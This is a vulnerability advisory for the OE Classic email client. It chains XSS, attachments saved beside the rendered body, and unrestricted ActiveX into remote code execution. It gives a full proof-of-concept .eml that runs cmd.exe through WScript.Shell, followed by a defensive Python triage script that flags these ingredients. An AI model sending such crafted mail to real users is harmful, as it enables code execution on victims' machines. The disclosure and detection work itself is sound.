OE Classic - a popular desktop email client that renders mail with the old Internet Explorer engine.
I think it's just luck that I could find this XSS and turn it into RCE, because the techniques I use are very old and I hadn't researched them in the past.
Vulnerability #1
Type: Cross-Site Scripting
Severity: high (the HTML is rendered from a file:// origin, so the attacker's JavaScript/VBScript can read local files)
Description: The application uses the IE engine to render HTML and does not sanitize it properly.
Example:
<BODY BACKGROUND="javascript:document.body.innerHTML='<textarea id=x>prompt(1,location);</textarea><button onclick=eval(document.getElementById(\'x\').innerHTML)>run</button>';">body</BODY>

Vulnerability #2
Type: Attachments and the email body are automatically written to the same directory
Severity: high (the attacker can load and run any attached file via a relative path)
Description: When the victim opens an email, its content and all of its attachments are written to this folder: C:\Users\%UserName%\AppData\Local\OEClassic\Prg\T\1-%number%\

Vulnerability #3
Type: Old IE engine used for rendering without ActiveX security restrictions
Severity: high (the attacker can instantiate arbitrary ActiveX objects)
Description: The old IE engine can instantiate arbitrary ActiveX objects, which leads to RCE (examples: https://www.exploit-db.com/exploits/11229, http://www.guninski.com/wmp-desc.html)
Full proof of concept (.eml file):

Subject: calc
From: test@gmail.com
To: test@yahoo.com
Content-Type: multipart/alternative; boundary=bcaec520ea5d6918e204a8cea3b4

--bcaec520ea5d6918e204a8cea3b4
Content-Type: text/html; charset=UTF-8;
Content-Transfer-Encoding: 7bit

<BODY BACKGROUND='javascript:document.body.innerHTML="\x3ciframe style=display:none src=./test.html name=test\x3e\x3c/iframe\x3e"'>BACKGROUND</BODY>

--bcaec520ea5d6918e204a8cea3b4
Content-Type: message/rfc822; charset=UTF-8; name="test.h\tml"
Content-Transfer-Encoding: 7bit

<html>
<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
wsh.Run("cmd.exe /k calc");
</script>
</html>

--bcaec520ea5d6918e204a8cea3b4
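The three bugs chain because the PoC needs all of them at once: a javascript: URL in BODY BACKGROUND (#1), an attachment that lands beside the rendered body so `./test.html` resolves (#2), and an ActiveX `<object classid=clsid:...>` plus `<script>` inside that attachment (#3). The following is an added example, not code from the advisory or from OE Classic: a stand-alone triage script that parses an .eml with Python's standard library and flags each ingredient. It also resolves the RFC 2822 quoted-pair in `name="test.h\tml"` (a backslash escapes the next character, so the name unquotes to `test.html`) and decodes `\x3c`-style escapes inside the script payload so the hidden iframe and its relative `src` are visible. `SAMPLE_EML` is constructed for this example and `DANGEROUS_EXT` is an assumption, not a list from the advisory.

```python
"""Static triage of an .eml for the OE Classic attack chain above.

Added example for this advisory, not code from the original post or from
OE Classic. It reports the three ingredients the PoC relies on: script
URLs in HTML attributes (BODY BACKGROUND XSS), attachments written next to
the body under a scriptable extension (including names hidden with an
RFC 2822 quoted-pair: "test.h\\tml" unquotes to test.html), and ActiveX
objects or relative loads in any HTML part, even when the tag is built
from \\xNN escapes inside the script. SAMPLE_EML is constructed for this
example; DANGEROUS_EXT is an assumption, not a list from the advisory.
"""
import email
import re
from email.message import Message

DANGEROUS_EXT = {"html", "htm", "hta", "mht", "mhtml", "exe", "scr", "bat",
                 "cmd", "js", "jse", "vbs", "vbe", "wsf", "wsh"}
# URL attributes as the IE engine reads them (background/dynsrc/lowsrc are
# legacy IE attributes that also accept javascript: URLs).
URL_ATTR_RE = re.compile(
    r"""\b(?P<attr>background|src|href|action|data|dynsrc|lowsrc)\s*=\s*"""
    r"""(?P<q>["']?)(?P<val>.*?)(?P=q)(?=[\s>]|$)""", re.I | re.DOTALL)
OBJECT_RE = re.compile(
    r"""<object\b[^>]*\bclassid\s*=\s*["']?\s*clsid:([0-9a-f-]{36})""", re.I)
SCRIPT_RE = re.compile(r"<script\b", re.I)
JS_ESCAPE_RE = re.compile(r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})")
# name= / filename= parameter: quoted-string (with quoted-pairs) or token.
PARAM_RE = re.compile(
    r""";\s*(?:name|filename)\s*=\s*(?P<val>"(?:[^"\\]|\\.)*"|[^;\s]+)""", re.I)


def decode_js_escapes(s: str) -> str:
    """Resolve \\xNN / \\uNNNN escapes so tags built inside a script show up."""
    return JS_ESCAPE_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def url_scheme(url: str) -> str:
    """Scheme as IE sees it: whitespace/control chars inside it are ignored."""
    cleaned = re.sub(r"[\x00-\x20]", "", url)
    m = re.match(r"([a-z][a-z0-9+.-]*):", cleaned, re.I)
    return m.group(1).lower() if m else ""


def unquote_rfc2822(value: str) -> str:
    """Strip quotes and resolve quoted-pairs (RFC 2822 3.2.5: a backslash
    escapes the next character), so "test.h\\tml" becomes test.html."""
    value = value.strip()
    if len(value) >= 2 and value[0] == value[-1] == '"':
        value = value[1:-1]
    return re.sub(r"\\(.)", r"\1", value)


def attachment_name(part: Message) -> tuple:
    """(raw, effective) name from Content-Type name= or Content-Disposition
    filename=, read from the raw header: the compat32 parser re-quotes
    parameters and leaves the quoted-pair unresolved, hiding the trick."""
    for header in ("content-type", "content-disposition"):
        m = PARAM_RE.search(str(part.get(header, "")))
        if m:
            return m.group("val"), unquote_rfc2822(m.group("val"))
    return "", ""


def part_text(part: Message) -> str:
    if part.is_multipart():  # containers and message/rfc822 wrappers
        return ""
    payload = part.get_payload(decode=True) or b""
    return payload.decode(part.get_content_charset() or "latin-1", "replace")


def scan_html(text: str, where: str, findings: list, depth: int = 0) -> None:
    """Flag script URLs, relative loads, ActiveX objects and inline script."""
    for m in URL_ATTR_RE.finditer(text):
        attr, val = m.group("attr").lower(), m.group("val")
        scheme = url_scheme(val)
        if scheme in ("javascript", "vbscript"):
            findings.append(("script-url", f"{where}: {attr}={scheme}:"))
            if depth < 3:  # tags hidden as \x3c...\x3e inside the payload
                scan_html(decode_js_escapes(val), where + " (decoded script)",
                          findings, depth + 1)
        elif not scheme and val and val[0] not in "/#":
            # Resolves against the folder the mail body and attachments share.
            findings.append(("relative-load", f"{where}: {attr}={val}"))
    for m in OBJECT_RE.finditer(text):
        findings.append(("activex", f"{where}: clsid:{m.group(1).upper()}"))
    if SCRIPT_RE.search(text):
        findings.append(("inline-script", where))


def triage(raw_eml: str) -> list:
    """Return (category, detail) findings for one message."""
    msg = email.message_from_string(raw_eml)  # default compat32 policy
    findings = []
    for i, part in enumerate(msg.walk()):
        where = f"part{i}:{part.get_content_type()}"
        raw, name = attachment_name(part)
        if raw.strip('"') != name:
            findings.append(("obfuscated-name", f"{where}: {raw} -> {name}"))
        if name.rsplit(".", 1)[-1].lower() in DANGEROUS_EXT:
            findings.append(("dangerous-attachment", f"{where}: {name}"))
        scan_html(part_text(part), where, findings)
    return findings


# Constructed sample modelled on the PoC structure (not the advisory's file).
SAMPLE_EML = r"""Subject: calc
Content-Type: multipart/alternative; boundary=b0

--b0
Content-Type: text/html; charset=UTF-8

<BODY BACKGROUND='javascript:document.body.innerHTML="\x3ciframe src=./test.html\x3e\x3c/iframe\x3e"'>x</BODY>
--b0
Content-Type: message/rfc822; name="test.h\tml"

<html>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>wsh.Run("cmd.exe /k calc");</script>
</html>
--b0--
"""

if __name__ == "__main__":
    for category, detail in triage(SAMPLE_EML):
        print(f"{category:22} {detail}")
```

Run it as-is to see the six findings on the sample, or pass the contents of a real .eml to `triage()`. The name parameter is parsed from the raw header on purpose: `Message.get_param()` only undoes `\\` and `\"`, so it would report the attachment as `test.h\tml` and a filter keyed on the `.html` extension would miss it.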